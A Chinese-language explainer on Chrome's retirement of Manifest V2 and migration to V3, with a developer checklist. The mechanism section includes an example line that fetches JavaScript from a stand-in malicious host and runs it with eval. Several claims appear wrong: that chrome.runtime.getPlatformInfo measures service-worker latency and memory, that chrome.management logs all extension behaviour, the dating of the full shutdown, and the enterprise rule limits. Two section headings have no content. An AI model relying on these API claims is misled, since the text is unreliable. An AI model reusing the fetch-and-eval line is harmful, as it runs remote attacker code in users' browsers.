Chrome浏览器为何不再支持Manifest V2扩展？

一、现象层：Chrome为何在2024年6月彻底停用Manifest V2？

自Chrome 127（2024年6月正式推送）起，所有非企业托管环境下的Manifest V2扩展均无法安装或运行。用户点击启用时将收到明确提示：“此扩展程序使用已弃用的Manifest版本，Chrome不再支持”。这一动作并非突发政策，而是Google自2021年M91起启动的三年渐进式淘汰计划的终点。

二、机制层：Manifest V2的“宽松权限模型”如何成为安全黑洞？

• "permissions": ["<all_urls>"] 允许无差别访问任意网页DOM，为键盘记录、表单窃取提供温床；
• content_scripts 可动态注入任意远程JS（如fetch("https://mal.example/c.js").then(eval)），绕过CSP；
• 后台页（background.html）长期驻留内存，具备完整API调用能力，且可执行eval()、new Function()等高危操作；
• 无最小权限声明机制——90%的V2扩展申请了远超功能所需的权限（如天气插件请求tabs和webRequest）。

三、架构层：Manifest V3如何重构浏览器扩展安全范式？

四、权衡层：V3引发的行业争议与技术妥协

广告拦截器（如uBlock Origin）在V3下需将数万条过滤规则预编译为静态declarativeNetRequest规则集，导致：

• 规则更新延迟：从秒级（V2动态JS）延长至小时级（需重新提交审核）；
• 规则数量硬上限：免费扩展仅限30,000条（企业版可扩至300,000）；
• 动态策略失效：无法实时响应网站结构变更（如CSS选择器突变）。

Google回应称：“可预测性优于灵活性——攻击者同样依赖动态性。”

五、演进层：从V2到V3的迁移路径与企业豁免逻辑

六、实践层：面向资深开发者的迁移检查清单

1. 将background.js重写为Service Worker，并移除window、document引用；
2. 用chrome.declarativeNetRequest替代webRequest API进行网络拦截；
3. 将动态生成的content script拆分为多个预定义JS文件，通过scripting.registerContentScripts声明；
4. 权限粒度收缩：删除"<all_urls>"，改用"host_permissions"按需声明；
5. 构建时校验：使用web-ext lint --manifest-version 3检测兼容性；
6. 性能监控：通过chrome.runtime.getPlatformInfo()采集SW启动延迟与内存占用。

七、战略层：V3不仅是技术升级，更是浏览器权力边界的再定义

Manifest V3标志着Chrome从“扩展能力平台”转向“受控服务代理”——扩展不再拥有对页面的直接控制权，而必须通过浏览器提供的声明式接口间接协作。这种转变使浏览器厂商获得三重治理能力：

• 审计能力：所有扩展行为均可通过chrome.management API全量日志化；
• 沙箱纵深：content script运行于独立渲染进程上下文，与页面主JS堆隔离；
• 策略主权：企业IT可通过ExtensionSettings策略强制启用/禁用特定API，无需修改扩展源码。